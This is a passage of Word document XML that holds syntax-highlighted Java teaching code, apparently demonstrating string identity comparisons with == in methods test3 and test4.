            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="0000C0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>out</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>.println(</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>s1</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> == </w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>s2</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E546DB" w:rsidRPr="00E546DB" w:rsidRDefault="00E546DB" w:rsidP="00E546DB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E546DB" w:rsidRPr="00E546DB" w:rsidRDefault="00E546DB" w:rsidP="00E546DB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E546DB" w:rsidRPr="00E546DB" w:rsidRDefault="00E546DB" w:rsidP="00E546DB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>static</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>void</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> test3() {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E546DB" w:rsidRPr="00E546DB" w:rsidRDefault="00E546DB" w:rsidP="00E546DB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">String </w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>s1</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="2A00FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"abc"</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E546DB" w:rsidRPr="00E546DB" w:rsidRDefault="00E546DB" w:rsidP="00E546DB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">String </w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>s2</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="2A00FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"a"</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E546DB" w:rsidRPr="00E546DB" w:rsidRDefault="00E546DB" w:rsidP="00E546DB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">String </w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>s3</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="2A00FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"bc"</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E546DB" w:rsidRPr="00E546DB" w:rsidRDefault="00E546DB" w:rsidP="00E546DB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">String </w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>s4</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>s2</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>s3</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E546DB" w:rsidRPr="00E546DB" w:rsidRDefault="00E546DB" w:rsidP="00E546DB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
              <w:t>System.</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="0000C0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>out</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>.println(</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>s1</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> == </w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>s4</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E546DB" w:rsidRPr="00E546DB" w:rsidRDefault="00E546DB" w:rsidP="00E546DB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E546DB" w:rsidRPr="00E546DB" w:rsidRDefault="00E546DB" w:rsidP="00E546DB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E546DB" w:rsidRPr="00E546DB" w:rsidRDefault="00E546DB" w:rsidP="00E546DB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>static</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>void</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>test4</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>() {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E546DB" w:rsidRPr="00E546DB" w:rsidRDefault="00E546DB" w:rsidP="00E546DB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">String </w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>s1</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="2A00FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"abc"</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E546DB" w:rsidRPr="00E546DB" w:rsidRDefault="00E546DB" w:rsidP="00E546DB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
